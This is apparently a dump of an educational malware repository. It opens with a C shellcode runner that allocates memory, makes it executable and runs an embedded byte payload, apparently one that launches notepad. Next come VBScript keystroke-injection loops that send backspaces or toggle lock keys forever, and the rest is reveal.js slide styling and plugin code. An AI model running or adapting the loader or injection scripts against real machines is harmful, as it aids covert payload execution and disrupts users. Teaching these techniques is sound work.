0xFF, 0xE0, 0x5F, 0x5F, 0x5A, 22 | 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00, 23 | 0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xE0, 0x1D, 24 | 0x2A, 0x0A, 0x68, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 25 | 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 26 | 0x00, 0x53, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 27 | 0x65, 0x78, 0x65, 0x00 28 | }; 29 | 30 | // shellcode length 31 | unsigned int shellcode_length = sizeof(shellcode_payload); 32 | 33 | // virtual protect function 34 | BOOL VirtualProtect( 35 | LPVOID lpAddress, 36 | SIZE_T dwSize, 37 | DWORD flNewProtect, 38 | PDWORD lpflOldProtect 39 | ); 40 | 41 | // main code 42 | int main(VOID) { 43 | 44 | // allocate the memory 45 | LPVOID memory_address = VirtualAlloc(NULL, 
shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 46 | 47 | // load shellcode into memory 48 | RtlMoveMemory(memory_address, shellcode_payload, shellcode_length); 49 | 50 | // make shellcode executable 51 | DWORD old_protection = 0; 52 | BOOL returned_vp = VirtualProtect(memory_address, shellcode_length, PAGE_EXECUTE_READ, & old_protection); 53 | 54 | // execute thread 55 | if (returned_vp != NULL) { 56 | HANDLE thread_handle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) memory_address, NULL, NULL, NULL); 57 | 58 | // waite for thread to complete 59 | WaitForSingleObject(thread_handle, INFINITE); 60 | } 61 | } 62 | 63 | -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://youtu.be/YFRwv7XgUDY) 2 | -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/injection-backspace.vbs: -------------------------------------------------------------------------------- 1 | Set wshShell=wscript.CreateObject("WScript.Shell") 2 | 3 | ' infinite loop 4 | do 5 | wshshell.sendkeys "{bs}" 6 | wscript.sleep 100 7 | loop 8 | 9 | ' for loop 10 | ' For count = 1 to 15 11 | ' key.sendkeys "{bs}" 12 | ' wscript.sleep 100 13 | ' Next 14 | -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/injection-disco.vbs: -------------------------------------------------------------------------------- 1 | Dim count 2 | Set key = CreateObject("wscript.shell") 3 | 4 | ' infinite loop 5 | do 6 | key.sendkeys "{CAPSLOCK}" 7 | key.sendkeys "{NUMLOCK}" 8 | key.sendkeys "{SCROLLLOCK}" 9 | wscript.sleep 100 10 | loop 11 | 12 | ' for loop 13 | ' For count = 1 to 100 14 | ' key.sendkeys "{CAPSLOCK}" 15 | ' key.sendkeys "{NUMLOCK}" 16 | ' key.sendkeys "{SCROLLLOCK}" 17 | ' wscript.sleep 100 18 | ' Next 
-------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/injection-string.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/keystroke-injection-vbs/injection-string.vbs -------------------------------------------------------------------------------- /videos/malware-roadmap/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://youtu.be/RCutqPF5fLs) 2 | 3 | open `index.html` in browser for interactive slides, alternatively view `slides.pdf` 4 | -------------------------------------------------------------------------------- /videos/malware-roadmap/css/vs2015.css: -------------------------------------------------------------------------------- 1 | pre code.hljs{display:block;overflow-x:auto;padding:1em}code.hljs{padding:3px 5px}.hljs{background:#1e1e1e;color:#dcdcdc}.hljs-keyword,.hljs-literal,.hljs-name,.hljs-symbol{color:#569cd6}.hljs-link{color:#569cd6;text-decoration:underline}.hljs-built_in,.hljs-type{color:#4ec9b0}.hljs-class,.hljs-number{color:#b8d7a3}.hljs-meta .hljs-string,.hljs-string{color:#d69d85}.hljs-regexp,.hljs-template-tag{color:#9a5334}.hljs-formula,.hljs-function,.hljs-params,.hljs-subst,.hljs-title{color:#dcdcdc}.hljs-comment,.hljs-quote{color:#57a64a;font-style:italic}.hljs-doctag{color:#608b4e}.hljs-meta,.hljs-meta .hljs-keyword,.hljs-tag{color:#9b9b9b}.hljs-template-variable,.hljs-variable{color:#bd63c5}.hljs-attr,.hljs-attribute{color:#9cdcfe}.hljs-section{color:gold}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-bullet,.hljs-selector-attr,.hljs-selector-class,.hljs-selector-id,.hljs-selector-pseudo,.hljs-selector-tag{color:#d7ba7d}.hljs-addition{background-color:#144212;display:inline-block;width:100%}.hljs-deletion{background-color:#600;display:inline-block;width:100%} 
-------------------------------------------------------------------------------- /videos/malware-roadmap/dist/reset.css: -------------------------------------------------------------------------------- 1 | /* http://meyerweb.com/eric/tools/css/reset/ 2 | v4.0 | 20180602 3 | License: none (public domain) 4 | */ 5 | 6 | html, body, div, span, applet, object, iframe, 7 | h1, h2, h3, h4, h5, h6, p, blockquote, pre, 8 | a, abbr, acronym, address, big, cite, code, 9 | del, dfn, em, img, ins, kbd, q, s, samp, 10 | small, strike, strong, sub, sup, tt, var, 11 | b, u, i, center, 12 | dl, dt, dd, ol, ul, li, 13 | fieldset, form, label, legend, 14 | table, caption, tbody, tfoot, thead, tr, th, td, 15 | article, aside, canvas, details, embed, 16 | figure, figcaption, footer, header, hgroup, 17 | main, menu, nav, output, ruby, section, summary, 18 | time, mark, audio, video { 19 | margin: 0; 20 | padding: 0; 21 | border: 0; 22 | font-size: 100%; 23 | font: inherit; 24 | vertical-align: baseline; 25 | } 26 | /* HTML5 display-role reset for older browsers */ 27 | article, aside, details, figcaption, figure, 28 | footer, header, hgroup, main, menu, nav, section { 29 | display: block; 30 | } -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.ttf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.woff -------------------------------------------------------------------------------- 
/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.ttf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: 'Source Sans Pro'; 3 | src: url('./source-sans-pro-regular.eot'); 4 | src: url('./source-sans-pro-regular.eot?#iefix') format('embedded-opentype'), 5 | url('./source-sans-pro-regular.woff') format('woff'), 6 | url('./source-sans-pro-regular.ttf') format('truetype'); 7 | font-weight: normal; 8 | font-style: normal; 9 | } 10 | 11 | @font-face { 12 | font-family: 'Source Sans Pro'; 13 | src: url('./source-sans-pro-italic.eot'); 14 | src: url('./source-sans-pro-italic.eot?#iefix') format('embedded-opentype'), 15 | url('./source-sans-pro-italic.woff') format('woff'), 16 | url('./source-sans-pro-italic.ttf') format('truetype'); 17 | font-weight: normal; 18 | font-style: italic; 19 | } 20 | 21 | @font-face { 22 | font-family: 'Source Sans Pro'; 23 | src: url('./source-sans-pro-semibold.eot'); 24 | src: url('./source-sans-pro-semibold.eot?#iefix') format('embedded-opentype'), 25 | url('./source-sans-pro-semibold.woff') format('woff'), 26 | url('./source-sans-pro-semibold.ttf') format('truetype'); 27 | font-weight: 600; 28 | font-style: normal; 29 | } 30 | 31 | @font-face { 32 | 
font-family: 'Source Sans Pro'; 33 | src: url('./source-sans-pro-semibolditalic.eot'); 34 | src: url('./source-sans-pro-semibolditalic.eot?#iefix') format('embedded-opentype'), 35 | url('./source-sans-pro-semibolditalic.woff') format('woff'), 36 | url('./source-sans-pro-semibolditalic.ttf') format('truetype'); 37 | font-weight: 600; 38 | font-style: italic; 39 | } 40 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/_style.css: -------------------------------------------------------------------------------- 1 | div.palette, div.boardhandle { 2 | position: absolute; 3 | /* 4 | height: 260px; 5 | margin: -130px 0 0 0px; 6 | */ 7 | top: 50%; 8 | transform: translateY(-50%); 9 | font-size: 24px; 10 | border-radius: 10px; 11 | border-top: 4px solid #222; 12 | border-right: 4px solid #222; 13 | border-bottom: 4px solid #222; 14 | background: black; 15 | transition: transform 0.3s; 16 | } 17 | 18 | div.palette { 19 | left: -10px; 20 | padding-left:10px; 21 | } 22 | 23 | div.boardhandle { 24 | right: -10px; 25 | padding-right:10px; 26 | } 27 | 28 | div.palette > ul, 29 | div.boardhandle > ul { 30 | list-style-type: none; 31 | margin: 0; 32 | padding: 0; 33 | } 34 | 35 | div.palette > ul > li, 36 | div.boardhandle > ul > li { 37 | margin: 10px; 38 | } 39 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/blackboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/blackboard.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-black.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-black.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-blue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-blue.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-green.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-orange.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-orange.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-purple.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-purple.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-red.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-red.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-yellow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-yellow.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-blue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-blue.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-green.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-orange.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-orange.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-purple.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-purple.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-red.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-white.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-yellow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-yellow.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/sponge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/sponge.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/whiteboard.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/whiteboard.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/style.css: -------------------------------------------------------------------------------- 1 | div.palette, div.boardhandle { 2 | position: absolute; 3 | /* 4 | height: 260px; 5 | margin: -130px 0 0 0px; 6 | */ 7 | top: 50%; 8 | transform: translateY(-50%); 9 | font-size: 24px; 10 | border-radius: 10px; 11 | border-top: 4px solid #222; 12 | border-right: 4px solid #222; 13 | border-bottom: 4px solid #222; 14 | background: black; 15 | transition: transform 0.3s; 16 | } 17 | 18 | div.palette { 19 | left: -10px; 20 | padding-left:10px; 21 | } 22 | 23 | div.boardhandle { 24 | right: -10px; 25 | padding-right:10px; 26 | } 27 | 28 | div.palette > ul, 29 | div.boardhandle > ul { 30 | list-style-type: none; 31 | margin: 0; 32 | padding: 0; 33 | } 34 | 35 | div.palette > ul > li, 36 | div.boardhandle > ul > li { 37 | margin: 10px; 38 | } 39 | 40 | @media print { 41 | div.palette, div.boardhandle, .chalkboard-button { 42 | display: none!important; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/customcontrols/README.md: -------------------------------------------------------------------------------- 1 | # Custom controls 2 | 3 | This plugin lets you add responsive custom controls to reveal.js, allowing arbitrary positioning, layout, and behaviour of the controls. 4 | 5 | [Check out the live demo](https://rajgoel.github.io/reveal.js-demos/customcontrols-demo.html) 6 | 7 | 8 | ## Installation 9 | 10 | Copy the files `plugin.js` and `style.css` into the plugin folder of your reveal.js presentation, i.e. ```plugin/customcontrols```, and load the plugin as shown below. 
11 | 12 | ```html 13 | 14 | 15 | 16 | 23 | ``` 24 | 25 | Note: without configuration you need to add 26 | 27 | ```javascript 28 | 29 | ``` 30 | 31 | between `````` and `````` of your HTML file, because the defaults use [Font Awesome](http://fontawesome.io/). 32 | 33 | 34 | 35 | ## Configuration 36 | 37 | The plugin can be configured by adding custom controls and changing the layout of the slide number, e.g., by: 38 | 39 | 40 | ```javascript 41 | Reveal.initialize({ 42 | // ... 43 | customcontrols: { 44 | controls: [ 45 | { 46 | id: 'toggle-overview', 47 | title: 'Toggle overview (O)', 48 | icon: '', 49 | action: 'Reveal.toggleOverview();' 50 | }, 51 | { icon: '', 52 | title: 'Toggle chalkboard (B)', 53 | action: 'RevealChalkboard.toggleChalkboard();' 54 | }, 55 | { icon: '', 56 | title: 'Toggle notes canvas (C)', 57 | action: 'RevealChalkboard.toggleNotesCanvas();' 58 | } 59 | ] 60 | }, 61 | // ... 62 | 63 | }); 64 | ``` 65 | 66 | The `id` and `title` are optional. The configuration should be self-explanatory, and any number of controls can be added. The style file can be altered to control the layout and responsiveness of the custom controls. 67 | 68 | ## License 69 | 70 | MIT licensed 71 | 72 | Copyright (C) 2020 Asvin Goel 73 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/customcontrols/plugin.js: -------------------------------------------------------------------------------- 1 | /***************************************************************** 2 | ** Author: Asvin Goel, goel@telematique.eu 3 | ** 4 | ** A plugin replacing the default controls with custom controls. 
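**
** Version: 2.0.0
**
** License: MIT license (see LICENSE.md)
**
******************************************************************/
window.RevealCustomControls = window.RevealCustomControls || {
	id: 'RevealCustomControls',
	init: function(deck) {
		initCustomControls(deck);
	}
};

/**
 * Build the custom control bar for a reveal.js deck and attach it to the
 * deck's `.reveal` element.
 *
 * Reads the `customcontrols` section of the deck config:
 *   collapseIcon / expandIcon - markup shown in the collapse/expand toggle
 *   tooltip                   - toggle button title (default 'Show/hide controls')
 *   controls                  - array of control entries; each becomes one <li>,
 *                               optionally carrying the entry's `id`
 *
 * @param {object} Reveal  the reveal.js deck instance (must provide getConfig())
 * @returns {*} the caller's `this`; the value is not used by init() above
 */
const initCustomControls = function(Reveal){
	var config = Reveal.getConfig().customcontrols || {};

	var collapseIcon = config.collapseIcon || '';
	var expandIcon = config.expandIcon || '';
	var tooltip = config.tooltip || 'Show/hide controls';
	// A config without `controls` used to throw on `.length`; treat it as "no controls".
	var controlsConfig = config.controls || [];

	var div = document.createElement( 'div' );
	div.id = 'customcontrols';

	var toggleButton = document.createElement( 'button' );
	toggleButton.title = tooltip;
	// NOTE(review): style.css toggles `#collapse-customcontrols` and
	// `#expand-customcontrols`; the empty string fragments around the two icons
	// look like stripped wrapper markup for those ids in this copy of the file —
	// confirm against the original plugin.js before relying on this line.
	toggleButton.innerHTML = '' + collapseIcon + '' + '' + expandIcon + '';

	toggleButton.addEventListener('click', function( event ) {
		// `div` is the element built above; no need to re-query the document.
		div.classList.toggle('collapsed');
	});

	div.appendChild(toggleButton);

	var controls = document.createElement( 'ul' );
	for (var i = 0; i < controlsConfig.length; i++ ) {
		var control = document.createElement( 'li' );
		if ( controlsConfig[i].id ) {
			control.id = controlsConfig[i].id;
		}
		// NOTE(review): the README documents `action` as a JavaScript source string
		// (e.g. 'Reveal.toggleOverview();'), so the control markup — apparently
		// stripped to '' in this copy — presumably wires it to the button. Treat
		// `customcontrols.controls` as deck-author code, never as something
		// derived from untrusted input.
		control.innerHTML = '';
		controls.appendChild( control );
	}
	div.appendChild( controls );

	document.querySelector(".reveal").appendChild( div );

	// `resize` is dispatched on window, not document, so the previous
	// document-level listener never fired.
	window.addEventListener( 'resize', function( event ) {
		// expand controls to make sure they are visible
		var collapsed = document.querySelector("div#customcontrols.collapsed");
		if ( collapsed ) {
			collapsed.classList.remove('collapsed');
		}
	} );

	return this;

};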
-------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/customcontrols/style.css: -------------------------------------------------------------------------------- 1 | #customcontrols { 2 | z-index: 40; 3 | position: fixed; 4 | left: 70px; 5 | bottom: 30px; 6 | text-align: center; 7 | font-size: 24px; 8 | } 9 | 10 | #customcontrols button { 11 | background: none; 12 | color: var(--r-link-color); 13 | border: none; 14 | padding: 0; 15 | font: inherit; 16 | cursor: pointer; 17 | outline: inherit; 18 | z-index: 40; 19 | } 20 | 21 | #customcontrols button:hover { 22 | color: var(--r-link-color-hover); 23 | } 24 | 25 | #customcontrols > ul { 26 | position: fixed; 27 | left: 54px; 28 | bottom: 64px; 29 | list-style-type: none; 30 | overflow: hidden; 31 | margin: 0; 32 | padding: 0; 33 | border: 1px solid var(--r-link-color); 34 | border-radius: 5px; 35 | padding: 10px; 36 | background-color: var(--r-background-color) 37 | } 38 | 39 | #customcontrols ul > li { 40 | margin: 0px 5px; 41 | padding: 0px 5px; 42 | float: left; 43 | } 44 | 45 | #customcontrols.collapsed #collapse-customcontrols, #customcontrols.collapsed > ul { 46 | display: none; 47 | } 48 | 49 | #customcontrols:not(.collapsed) #expand-customcontrols { 50 | display: none; 51 | } 52 | 53 | @media only screen and (min-width: 500px) { 54 | #customcontrols > button { 55 | display: none; 56 | } 57 | #customcontrols > ul { 58 | bottom: 20px; 59 | border: none; 60 | background: none; 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/highlight/monokai.css: -------------------------------------------------------------------------------- 1 | /* 2 | Monokai style - ported by Luigi Maselli - http://grigio.org 3 | */ 4 | 5 | .hljs { 6 | display: block; 7 | overflow-x: auto; 8 | padding: 0.5em; 9 | background: #272822; 10 | color: #ddd; 11 | } 12 | 13 | .hljs-tag, 14 | .hljs-keyword, 15 | 
.hljs-selector-tag, 16 | .hljs-literal, 17 | .hljs-strong, 18 | .hljs-name { 19 | color: #f92672; 20 | } 21 | 22 | .hljs-code { 23 | color: #66d9ef; 24 | } 25 | 26 | .hljs-class .hljs-title { 27 | color: white; 28 | } 29 | 30 | .hljs-attribute, 31 | .hljs-symbol, 32 | .hljs-regexp, 33 | .hljs-link { 34 | color: #bf79db; 35 | } 36 | 37 | .hljs-string, 38 | .hljs-bullet, 39 | .hljs-subst, 40 | .hljs-title, 41 | .hljs-section, 42 | .hljs-emphasis, 43 | .hljs-type, 44 | .hljs-built_in, 45 | .hljs-builtin-name, 46 | .hljs-selector-attr, 47 | .hljs-selector-pseudo, 48 | .hljs-addition, 49 | .hljs-variable, 50 | .hljs-template-tag, 51 | .hljs-template-variable { 52 | color: #a6e22e; 53 | } 54 | 55 | .hljs-comment, 56 | .hljs-quote, 57 | .hljs-deletion, 58 | .hljs-meta { 59 | color: #75715e; 60 | } 61 | 62 | .hljs-keyword, 63 | .hljs-selector-tag, 64 | .hljs-literal, 65 | .hljs-doctag, 66 | .hljs-title, 67 | .hljs-section, 68 | .hljs-type, 69 | .hljs-selector-id { 70 | font-weight: bold; 71 | } 72 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/highlight/zenburn.css: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Zenburn style from voldmar.ru (c) Vladimir Epifanov 4 | based on dark.css by Ivan Sagalaev 5 | 6 | */ 7 | 8 | .hljs { 9 | display: block; 10 | overflow-x: auto; 11 | padding: 0.5em; 12 | background: #3f3f3f; 13 | color: #dcdcdc; 14 | } 15 | 16 | .hljs-keyword, 17 | .hljs-selector-tag, 18 | .hljs-tag { 19 | color: #e3ceab; 20 | } 21 | 22 | .hljs-template-tag { 23 | color: #dcdcdc; 24 | } 25 | 26 | .hljs-number { 27 | color: #8cd0d3; 28 | } 29 | 30 | .hljs-variable, 31 | .hljs-template-variable, 32 | .hljs-attribute { 33 | color: #efdcbc; 34 | } 35 | 36 | .hljs-literal { 37 | color: #efefaf; 38 | } 39 | 40 | .hljs-subst { 41 | color: #8f8f8f; 42 | } 43 | 44 | .hljs-title, 45 | .hljs-name, 46 | .hljs-selector-id, 47 | .hljs-selector-class, 48 | 
.hljs-section, 49 | .hljs-type { 50 | color: #efef8f; 51 | } 52 | 53 | .hljs-symbol, 54 | .hljs-bullet, 55 | .hljs-link { 56 | color: #dca3a3; 57 | } 58 | 59 | .hljs-deletion, 60 | .hljs-string, 61 | .hljs-built_in, 62 | .hljs-builtin-name { 63 | color: #cc9393; 64 | } 65 | 66 | .hljs-addition, 67 | .hljs-comment, 68 | .hljs-quote, 69 | .hljs-meta { 70 | color: #7f9f7f; 71 | } 72 | 73 | 74 | .hljs-emphasis { 75 | font-style: italic; 76 | } 77 | 78 | .hljs-strong { 79 | font-weight: bold; 80 | } 81 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/katex.js: -------------------------------------------------------------------------------- 1 | /** 2 | * A plugin which enables rendering of math equations inside 3 | * of reveal.js slides. Essentially a thin wrapper for KaTeX. 4 | * 5 | * @author Hakim El Hattab 6 | * @author Gerhard Burger 7 | */ 8 | export const KaTeX = () => { 9 | let deck; 10 | 11 | let defaultOptions = { 12 | version: 'latest', 13 | delimiters: [ 14 | {left: '$$', right: '$$', display: true}, // Note: $$ has to come before $ 15 | {left: '$', right: '$', display: false}, 16 | {left: '\\(', right: '\\)', display: false}, 17 | {left: '\\[', right: '\\]', display: true} 18 | ], 19 | ignoredTags: ['script', 'noscript', 'style', 'textarea', 'pre'] 20 | } 21 | 22 | const loadCss = src => { 23 | let link = document.createElement('link'); 24 | link.rel = 'stylesheet'; 25 | link.href = src; 26 | document.head.appendChild(link); 27 | }; 28 | 29 | /** 30 | * Loads a JavaScript file and returns a Promise for when it is loaded 31 | * Credits: https://aaronsmith.online/easily-load-an-external-script-using-javascript/ 32 | */ 33 | /* NOTE(review): the tag is appended with only `src` set — no `integrity` or `crossorigin` attribute — so nothing verifies the bytes the URL served before they run in the slide page. */ const loadScript = src => { 34 | return new Promise((resolve, reject) => { 35 | const script = document.createElement('script') 36 | script.type = 'text/javascript' 37 | script.onload = resolve 38 | script.onerror = reject 39 | script.src = src 40 | 
